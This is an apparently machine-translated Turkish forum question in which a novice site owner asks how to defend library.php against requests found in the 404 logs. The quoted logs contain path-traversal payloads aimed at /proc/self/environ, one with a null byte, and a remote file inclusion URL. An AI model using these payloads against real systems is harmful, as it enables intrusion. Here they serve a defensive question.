404 günlüklerime baktığımda, her ikisi de bir kez meydana gelen şu iki URL'yi fark ettim:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
ve
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
Söz konusu sayfa, library.php
bir gerektiriyor type
sonra yarım düzine farklı kabul edilebilir değerlerle değişken ve bir id
değişken. Dolayısıyla, geçerli bir URL
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
ve kimliklerin tümü mysql_real_escape_string
veritabanını sorgulamak için kullanılmadan önce çalıştırılır .
Ben bir çaylakım, ama bana göre bu bağlantıların her ikisi de webroot'a karşı basit saldırılar mı?
1) Bir 404 dışında bu tür şeylere karşı en iyi nasıl korunabilirim?
2) Sorumlu IP'lere izin vermeli miyim?
EDIT: bunu da fark ettim
/library.php=http://www.basfalt.no/scripts/danger.txt
DÜZENLEME 2: 3 saldırının tümü için rahatsız edici IP 216.97.231.15
, Los Angeles'ın hemen dışında bulunan Lunar Pages adlı bir İSS'yi izlemiştir.
DÜZENLEME 3: Cuma sabahı yerel saat ISS'yi aramaya ve telefonda kimin bulabileceğine dair konuyu tartışmaya karar verdim. Sonuçları 24 saat içinde buraya göndereceğim.
EDIT 4: Ben onların yöneticilerini e-posta ile sona erdi ve ilk önce onlar "içine bakıyorduk" ve sonra bir gün sonra "Bu sorun şimdi çözülmelidir" ile cevap verdi. Ne yazık ki başka ayrıntı yok.
type
Kullanımına dahil senaryoyu söyler (bir ile olsa IF $_GET['type'] == 'thing') {} ESLE...
, değil gibi doğrudan bir bağlantı olarak include 'type.php'
) ve id
mysql_real_escape_string üzerinden çalışmasını ve bu sorguları için kullanılır. Bunu bilerek hala güvende miyim?